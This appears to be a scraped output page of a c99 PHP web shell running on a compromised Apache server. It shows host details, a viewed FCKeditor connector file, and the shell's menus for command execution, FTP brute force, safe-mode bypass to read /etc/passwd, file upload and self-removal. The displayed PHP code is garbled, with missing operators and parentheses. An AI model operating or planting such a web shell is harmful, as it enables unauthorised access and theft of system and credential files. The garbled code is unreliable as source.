!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/ealumni/fckeditor/editor/filemanager/connectors/php/   drwxr-xr-x
Free 48.07 GB of 127.8 GB (37.61%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     basexml.php (2.39 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * FCKeditor - The text editor for Internet - http://www.fckeditor.net
 * Copyright (C) 2003-2007 Frederico Caldeira Knabben
 *
 * == BEGIN LICENSE ==
 *
 * Licensed under the terms of any of the following licenses at your
 * choice:
 *
 *  - GNU General Public License Version 2 or later (the "GPL")
 *    http://www.gnu.org/licenses/gpl.html
 *
 *  - GNU Lesser General Public License Version 2.1 or later (the "LGPL")
 *    http://www.gnu.org/licenses/lgpl.html
 *
 *  - Mozilla Public License Version 1.1 or later (the "MPL")
 *    http://www.mozilla.org/MPL/MPL-1.1.html
 *
 * == END LICENSE ==
 *
 * These functions define the base of the XML response sent by the PHP
 * connector.
 */

function SetXmlHeaders()
{
    ob_end_clean() ;

    // Prevent the browser from caching the result.
    // Date in the past
    header('Expires: Mon, 26 Jul 1997 05:00:00 GMT') ;
    // always modified
    header('Last-Modified: ' gmdate('D, d M Y H:i:s') . ' GMT') ;
    // HTTP/1.1
    header('Cache-Control: no-store, no-cache, must-revalidate') ;
    header('Cache-Control: post-check=0, pre-check=0'false) ;
    // HTTP/1.0
    header('Pragma: no-cache') ;

    // Set the response format.
    header'Content-Type: text/xml; charset=utf-8' ) ;
}

function CreateXmlHeader$command$resourceType$currentFolder )
{
    SetXmlHeaders() ;

    // Create the XML document header.
    echo '<?xml version="1.0" encoding="utf-8" ?>' ;

    // Create the main "Connector" node.
    echo '<Connector command="' $command '" resourceType="' $resourceType '">' ;

    // Add the current folder node.
    echo '<CurrentFolder path="' ConvertToXmlAttribute$currentFolder ) . '" url="' ConvertToXmlAttributeGetUrlFromPath$resourceType$currentFolder$command ) ) . '" />' ;

    $GLOBALS['HeaderSent'] = true ;
}

function CreateXmlFooter()
{
    echo '</Connector>' ;
}

function SendError$number$text )
{
    if ( isset( $GLOBALS['HeaderSent'] ) && $GLOBALS['HeaderSent'] )
    { 
        SendErrorNode$number$text ) ;
        CreateXmlFooter() ;
    }
    else
    {
        SetXmlHeaders() ;

        // Create the XML document header
        echo '<?xml version="1.0" encoding="utf-8" ?>' ;

        echo '<Connector>' ;
        
        SendErrorNode$number$text ) ;
        
        echo '</Connector>' ;
    }
    exit ;
}

function SendErrorNode(  $number$text )
{
    echo '<Error number="' $number '" text="' htmlspecialchars$text ) . '" />' ;
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0107 ]--